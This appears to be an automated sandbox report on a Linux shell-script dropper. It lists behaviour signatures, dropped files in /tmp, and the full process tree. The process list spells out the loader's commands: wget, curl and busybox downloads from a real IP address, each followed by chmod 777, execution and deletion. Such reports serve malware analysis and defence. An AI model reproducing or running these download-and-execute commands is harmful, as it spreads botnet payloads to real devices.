Analysis Overview
SHA256
01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9
Threat Level: Shows suspicious behavior
The file 01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 02:02
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 02:02
Reported
2024-11-21 02:04
Platform
debian9-armhf-20240611-en
Max time kernel
60s
Max time network
64s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
Processes
/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh
[/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
